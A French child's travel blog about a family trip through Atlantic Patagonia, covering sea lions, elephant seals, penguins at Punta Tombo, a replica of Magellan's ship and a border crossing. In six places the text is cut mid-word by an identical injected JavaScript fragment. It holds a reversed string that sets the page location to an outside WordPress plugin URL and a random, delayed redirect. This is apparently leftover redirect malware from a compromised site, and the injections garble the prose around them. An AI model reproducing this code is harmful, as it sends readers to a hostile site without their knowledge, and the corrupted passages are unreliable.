Trop mignonne la Patagonie Atlantique !

by Alice

Jeudi 9 janvier

Aujourd’hui nous sommes à côté de Viedma et nous avons vu des lions de mer et pour la première fois du voyage nous avons sorti les kways et les pulls !!! 

Vendredi 10 janvier

Ce matin nous avons marché sur une plage pour voir les lions de mer. On en a vu 3 dont 1 qui était vraiment près de nous. Ce sont des gros feignants : Un lion de mer voulait aller dans l’océan mais il n’a fait que 3 pas. Porter 300 Kg, c’est lourd !!!

Ensuite nous avons sauté par dessus les vagues mais elles étaient très grosses car c’était marée montante. On a visité un vieux phare qui avait 180 ans. Autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour du phare il y avait une colonie de perroquets, c’est l’une des plus grosses colonie au monde. Puis nous avons roulé sur une route complètement droite.

Lundi 13 janvier

Dimanche on a fait de la plongée pour aller voir et nager avec les lions de mers. Nous étions équipé de masque, tuba, palmes et combinaison, un bateau et 3 moniteurs. Quand je suis rentrée dans l’eau, l’eau était très froide. Après être restée accrochée à la bouée je suis partie nager et j’ai toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}touché un gros mâle. Il m’a regardé dans les yeux et puis il est parti. Sa peau était très douce, comme de la fourrure.

Après la sortie en mer on est allé sur une plage très isolée. On s’est ensablé mais il y avait une famille qui a pu nous aider.

Aujourd’hui on a vu des éléphants de mer qui sont venus faire leur sieste juste à côté de nous. Ils avaient leur peau qui se détachait mais c’est normal,c’est la saison.

Mais on a était obligé de partir car il commençait à pleuvoir et il fallait remonter la piste. 

Dimanche 19 janvier

Après l’île on est allé à Punta Tombo voir des manchots de Magellan. Petit à petit on a vu des nids en plein désert et souvent ils se mettent à l’ombre grâce à des plantes. Leurs enfants sont de la même taille que les adultes sauf qu’ils ont du duvet et surtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout ils sont plus choux !!

On a vu aussi quelques manchots crier et courir. Pour crier ils ouvrent leur bec et ils mettent leur tête en haut comme des loups, sauf que leur cri est beaucoup plus aigu. Ensuite on a vu des manchots sauter dans l’eau.

Mercredi 22 janvier 16h55 France 20h55

Le 17 janvier nous avons visité le bateau de Magellan. C’était un capitaine de bateau. Il y avait 5 bateaux dans la flotte et on a vu un bateau qui transportait la nourriture. Le capitaine de ce bateau s’appelait Mendoza. Dans les cales du bateau il y avait des animaux vivants et des esclaves. En haut il y avait des marins. Nous n’avons vu que le bas car il y avait trop de vent. Mais la dame qui nous a fait visiter ce bateau nous a dit que en haut il n’y avait que la chambre de Magellan. Les 5 bateaux sont partis d’Espagne et sont arrivés à San Julian. Sur place les gens qui habitaient là étaient très grands. Cela a rappelé une histoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toire de géants que Magellan avait lu dans son enfance donc Magellan les a appelés les « Patagons » qui s’est transformé en « Patagonie ». Après être restés sur place quelques mois, Mendoza et les 3 autres bateaux voulaient arrêter l’expédition et rentrer en Espagne. Alors Magellan a fait écarteler Mendoza sous les yeux de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous les marins qui voulaient rentrer. Ça les a calmés !

Le 18 nous avons dormi prés d’un volcan et il y avait BEAUCOUP de vent. 

Le 19 nous avons rencontré un Coréen. Nous l’avons rencontré sur la route en train de faire du vélo avec ses bagages car il veut voyager 7 ans en vélo. Il y avait un vent horrible et Kyu a failli se renverser. C’est un prof de math. Lui aussi il veut aller à Ushuaia. Nous avons traversé la frontière Chilienne avec lui puis nous avons traversé le détroit de Magellan en  ferry pour ensuite repasser la frontière Argentine.